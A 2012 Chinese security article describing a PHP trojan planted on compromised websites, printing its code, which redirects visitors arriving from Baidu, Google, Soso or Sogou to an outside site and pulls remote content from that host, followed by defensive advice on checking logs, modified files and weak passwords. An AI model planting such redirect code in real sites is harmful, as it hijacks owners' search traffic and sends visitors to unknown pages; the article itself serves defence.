介紹一個(gè)截取搜索引擎流量的 php木馬

來源：瀏覽數(shù)：
責(zé)任編輯：robert 時(shí)間：2012-03-02 21:34

分享到：

[導(dǎo)讀]

截取搜索引擎流量的php木馬很早就有了，它的作用便是將來自搜索引擎的流量轉(zhuǎn)移到目標(biāo)網(wǎng)站上去。因此，用戶搜索到的雖然是你的網(wǎng)站，打開的卻是別人的網(wǎng)站。

下面這段代碼是一個(gè)很簡(jiǎn)單的示例，技術(shù)進(jìn)步很快，這樣的木馬今天已經(jīng)不太可能再發(fā)揮作用了。但這種木馬的核心內(nèi)容卻是萬變不離其宗，只是手段更高明些罷了。好，以下便是轉(zhuǎn)移搜索引擎來路流量的php代碼：

error_reporting(E_ERROR);

header('content-Type:
text/html; charset=gb2312');

$come_from="baidu.com#google.com.hk#soso.com#sogou.com#cache.baidu.com#google.cn";

$referer =
Split("#",$come_from) ;

foreach($referer as $v)

{

if(stristr($_SERVER['HTTP_REFERER'],$v))

{

Header("Location:".'http://www.abc.com/3/nb.html?'.$_SERVER['SERVER_NAME']);

}

echo
file_get_contents('http://www.abc.com//xx/dn2.php');

}

代碼十分簡(jiǎn)單：如果訪問來源是baidu，google，soso或sogou等搜索引擎，那么將會(huì)定位到如下所述的html文件和php文件。

如何防范類似的攻擊呢？

首先是要經(jīng)常看看網(wǎng)站的IIS日志，如果有異?？梢约霸绨l(fā)現(xiàn)。看到有陌生的文件后打開看看，有問題的話就直接刪除。其次常用的系統(tǒng)php文件也要經(jīng)常打開看看，檢查這些文件最近是否被修改過。如果有，那么下載下來，查找里面出現(xiàn)的陌生php文件名，比如出現(xiàn)了一個(gè)沒見過的dumy.php，可以搜索下dumy.php，看看是怎么回事。還有，一般別的目錄下還會(huì)另有木馬隱藏，在這里可以找到此蹤跡。最后也是最重要的，防患于未然，登錄口令要加強(qiáng)，不管是FTP賬號(hào)還是網(wǎng)站后臺(tái)地址和登錄名，或是別的什么密碼，如果太弱了，那么建議修改得更復(fù)雜些，這是最簡(jiǎn)單也是最有效的安全措施。

網(wǎng)站安全應(yīng)該時(shí)刻銘記在心，你不在意，那些掛黑鏈的人可惦記你。

免責(zé)聲明：本文僅代表作者個(gè)人觀點(diǎn)，與納金網(wǎng)無關(guān)。其原創(chuàng)性以及文中陳述文字和內(nèi)容未經(jīng)本站證實(shí)，對(duì)本文以及其中全部或者部分內(nèi)容、文字的真實(shí)性、完整性、及時(shí)性本站不作任何保證或承諾，請(qǐng)讀者僅作參考，并請(qǐng)自行核實(shí)相關(guān)內(nèi)容。

TAGS：